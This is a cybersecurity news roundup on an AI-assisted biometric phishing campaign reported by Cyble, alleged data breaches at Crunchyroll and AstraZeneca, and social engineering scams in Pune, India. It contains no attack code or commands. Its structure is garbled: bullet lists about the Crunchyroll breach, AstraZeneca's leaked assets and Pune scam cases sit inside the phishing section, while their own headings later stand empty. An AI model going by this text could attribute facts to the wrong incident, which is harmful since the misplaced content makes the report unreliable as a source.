The cybersecurity landscape faces new threats daily. AI-driven attacks, data breaches, and social engineering scams are on the rise. This report delves into the latest incidents, from Europe’s geopolitical cyber threats to global phishing campaigns and high-profile breaches at Crunchyroll and AstraZeneca.
Global AI-Assisted Phishing Campaign
Cyble, a leading AI-powered cyber threat intelligence firm, has uncovered a global phishing campaign that exploits browser permissions to harvest biometric data, including facial images, audio recordings, and device telemetry. Unlike traditional phishing attacks targeting login credentials, this campaign abuses legitimate browser APIs to trick users into granting access to their cameras and microphones under false pretenses, such as “identity verification” or “service recovery”.
Key findings from Cyble’s research:
- AI-enhanced development: The campaign’s code contains structured annotations and emoji-based formatting, suggesting the use of generative AI tools to accelerate malicious payload creation. This aligns with broader trends in AI in cybersecurity.
- Biometric harvesting: Attackers bypass traditional security measures by exfiltrating high-resolution facial images and audio, which can be weaponized for deepfake attacks or to bypass Video-KYC (Know Your Customer) protocols.
- Abuse of trusted brands: The campaign impersonates platforms like TikTok, Telegram, Instagram, and Google Chrome, using lures such as “ID Scanners” and “Health Fund AI” to gain user trust. This tactic is consistent with Cyble’s findings.
- Scalable infrastructure: Threat actors utilize edgeone.app for low-cost hosting and Telegram Bot APIs for streamlined data exfiltration, making the campaign difficult to dismantle. This scalability is a significant concern in the escalating cyber threats.
- Account takeovers (ATO): Biometric data can bypass remote identity verification systems.
- Extortion and fraud: Captured multimedia fuels blackmail or Business Email Compromise (BEC) schemes. This is a growing issue in cybercrime surges.
- Reputational damage: Misuse of brand identities erodes trust in digital onboarding processes.
- The attack occurred on March 12, 2026, but Crunchyroll reportedly took 24 hours to detect the breach.
- The threat actor claimed to have contacted Crunchyroll but received no response, prompting public disclosure.
- Sample data includes credit card credentials, email addresses, and support tickets, raising concerns about identity theft and financial fraud.
- Crunchyroll is also facing a class-action lawsuit in the U.S. for allegedly sharing user data with third-party marketing firms, further damaging its reputation.
- Source code: Java Spring Boot applications, Angular frontend frameworks, and Python scripts.
- Cloud infrastructure: Terraform configurations for AWS and Azure, alongside Ansible roles for automation.
- Secrets and access: Private cryptographic keys, Vault credentials, and authentication tokens for GitHub and Jenkins CI/CD pipelines.
- Supply chain portal: The breach includes data from an internal supply-chain portal (als-sc-portal-internal), which manages forecasting, inventory tracking, SAP integration, and delivery metrics.
- Franchise scam: A victim lost Rs 5.79 lakh after fraudsters promised a “ready-made online business” with guaranteed returns. Payments were extracted in stages under various pretexts (registration fees, activation charges) before the scammers disappeared.
- OTP trap: An 81-year-old man lost Rs 3 lakh after sharing an OTP to “confirm” an electric burner order. The fraudster used the OTP to drain his bank account via unauthorized transactions.
- APK file scam: A victim in Hadapsar lost Rs 3.53 lakh after installing a malicious APK file sent by scammers impersonating American Express. The file granted remote access to the victim’s device, enabling fraudulent transactions.
- AI-powered personalization: Scammers use deepfake voices and AI-generated emails to mimic trusted contacts. This highlights the increasing sophistication of such attacks.
- Psychological triggers: Fraudsters exploit authority (police, bank officials), urgency (‘act now or face arrest’), fear (‘your account is compromised’), and greed (‘high-return investments’). These tactics prey on victims’ emotional responses, making them more susceptible to deception.
- Long-term trust building: Some scams involve weeks of interaction before requesting money, making them harder to detect. Scammers build trust over time, often pretending to be friends or business partners.
- Students: Targeted via fake job/internship offers. Students, often inexperienced and eager for opportunities, are easy targets for scammers posing as legitimate employers.
- IT professionals: Lured into trading or investment frauds. Their familiarity with technology and financial markets makes them attractive targets for sophisticated investment scams. For more on these tactics.
- Elderly citizens: Vulnerable to impersonation and APK scams. Elderly individuals, less tech-savvy and more trusting, are often victimized by scams that exploit their lack of digital literacy.
- Never share OTPs, PINs, or banking details. This basic advice is often ignored, leading to significant financial loss.
- Verify calls claiming to be from banks or police via official channels. Double-checking can prevent falling victim to impersonation scams.
- Avoid downloading apps from untrusted sources. Stick to official app stores to minimize the risk of installing malicious software.
- Report scams immediately to the National Cyber Crime Helpline (1930) or cybercrime.gov.in. Prompt reporting can help authorities track and apprehend scammers.
Business impact: The stolen data enables:
Recommendations: Cyble advises users to deny unexpected hardware permission requests and organizations to monitor domains for suspicious infrastructure and restrict outbound traffic to unauthorized APIs like Telegram. For more details, read the full press release here.
Data Breaches at Crunchyroll and AstraZeneca
Popular anime streaming platform Crunchyroll is reportedly the victim of a significant data breach, with subscriber information—including emails, credit card details, and IP addresses—leaked online. According to an unverified report by International Cyber Digest on X (formerly Twitter), the breach originated from a third-party service provider, Telus, whose employee allegedly introduced malware into Crunchyroll’s ticketing system.
Key details:
As of now, Crunchyroll has not issued an official statement, leaving subscribers in limbo. Users are advised to monitor their financial accounts and change passwords if they suspect exposure. For updates, follow the story here.
The notorious hacking collective LAPSUS$ has resurfaced, allegedly breaching multinational pharmaceutical giant AstraZeneca. The group claims to have exfiltrated 3GB of internal data, including source code, cloud infrastructure configurations, and cryptographic keys, and is attempting to sell the dump via private channels.
Compromised assets breakdown:
LAPSUS$ has shared screenshots and password-protected samples as proof, but AstraZeneca has not yet confirmed the breach. The exposure of such sensitive data could disrupt pharmaceutical distribution and enable secondary attacks. Security researchers are monitoring the situation closely. For technical details, read the full report here.
Both incidents highlight the critical need for robust cybersecurity measures, especially in protecting sensitive user data and infrastructure. For more insights into data breaches and their mitigation, refer to the article on understanding and mitigating data breaches.
Social Engineering Scams in India: The Human Factor
India is experiencing a surge in social engineering scams, where fraudsters manipulate human psychology rather than exploiting technical vulnerabilities. According to reports from Pune, scammers are using deepfake voices, fake authority figures, and urgency tactics to defraud victims of lakhs of rupees. Nearly 60% of cyber breaches in India now involve human error or manipulation, making awareness critical.
Recent cases in Pune:
Evolving tactics:
Vulnerable groups in Pune:
Prevention tips:
As Adv. Rajas Pingle, a cybersecurity expert, notes: *“The biggest defense against cybercrime is not software, but awareness. If you pause, question, and verify, most scams fail instantly.”* For more on Pune’s cybercrime landscape, read the full report here and here.
Final words
The cybersecurity landscape is evolving at an alarming pace, with AI-driven attacks, state-sponsored espionage, and social engineering scams becoming the norm. Biometric data is now a prime target for identity theft and deepfake fraud. Supply chain vulnerabilities and human error continue to pose significant risks. Collaboration between governments, businesses, and individuals is essential to mitigate these threats. Stay updated and report incidents promptly to mitigate damage.